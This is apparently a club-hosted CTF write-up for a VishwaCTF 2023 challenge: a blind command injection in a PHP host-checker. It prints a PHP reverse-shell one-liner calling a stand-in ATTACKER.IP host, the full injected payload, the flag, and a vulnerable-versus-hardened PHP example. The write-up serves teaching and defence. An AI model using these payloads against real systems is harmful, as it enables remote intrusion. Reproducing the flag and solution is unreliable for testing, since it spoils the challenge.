WGCS | VishwaCTF-2023 Resources

Learn some CTF tips and tricks! Presented by the WGCS Club at KLSGIT


Project created by KLSGIT-WGCS. Maintained by Darshan.

Writeup - VishwaCTF

Description

In my college level project I created this website that tells us if any domain/ip is active or not. But there is a catch.


Solution

The proper method to solve this challenge was to perform a blind command injection.


This is how the website functions

Now let's try to play with it.


FISHY!

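Now this is a sign of a blind command injection: entering localhosts alone tells you that it is not active, but appending ;ls returns that it is active. The output of ls is never shown, only the changed result, which suggests the input reaches a shell and the appended command decides the answer.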

After inspecting the request I intercepted in Burp Suite, I found this: X-Powered-By: PHP/8.1.2-1ubuntu2.11

This tells us two things: 1. The OS is Ubuntu. 2. The website's backend is PHP. So I went to revshells.com and grabbed this reverse shell payload:

php -r '$sock=fsockopen("ATTACKER.IP",1337);shell_exec("sh <&3 >&3 2>&3");'

An nc listener is running, as well as ngrok. The final payload I sent to the web application is this:

localhosts;php -r '$sock=fsockopen("ATTACKER.IP",1337);shell_exec("sh <&3 >&3 2>&3");'


To print the flag, we can use the cat command, or we can access the directory (add /flag.txt to the URL).


VishwaCTF{b1inD_cmd-i}
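
The behaviour seen above (localhosts alone reported as not active, localhosts;ls reported as active) is what a checker that builds a shell command from its input would produce. The PHP below is an added example, not the challenge's source code: the function names and the ping invocation are assumptions, and it shows the flaw beside a validated, quoted form.

```php
<?php
// Added example, not the challenge's source. check_host_vulnerable() is an
// assumed reconstruction of the flaw; all names and ping flags are hypothetical.

// VULNERABLE: user input is concatenated into a shell command line, so
// "localhosts;ls" runs ping (which fails) and then ls (which succeeds).
// exec() reports the exit status of the last command, so the page
// answers "active" even though no valid host was given.
function check_host_vulnerable(string $host): bool
{
    exec("ping -c 1 " . $host, $output, $status);
    return $status === 0;
}

// Accept only an IP literal or a syntactically valid hostname.
// Shell metacharacters, spaces and a leading "-" all fail this check.
function is_valid_target(string $host): bool
{
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    return filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
}

// HARDENED: validate first, then pass the value as one quoted argument.
// "--" keeps ping from reading the value as an option.
function check_host_hardened(string $host): bool
{
    if (!is_valid_target($host)) {
        return false;
    }
    exec("ping -c 1 -- " . escapeshellarg($host), $output, $status);
    return $status === 0;
}

// Constructed sample inputs: only the validation runs here, nothing is pinged.
foreach (["localhost", "127.0.0.1", "localhosts;ls", "a.example && id", "-f"] as $sample) {
    printf("%-18s %s\n", $sample, is_valid_target($sample) ? "accepted" : "rejected");
}
```

Validation and quoting are layered on purpose: either one alone stops the ;ls input, and together they also cover option injection through a value that starts with a dash.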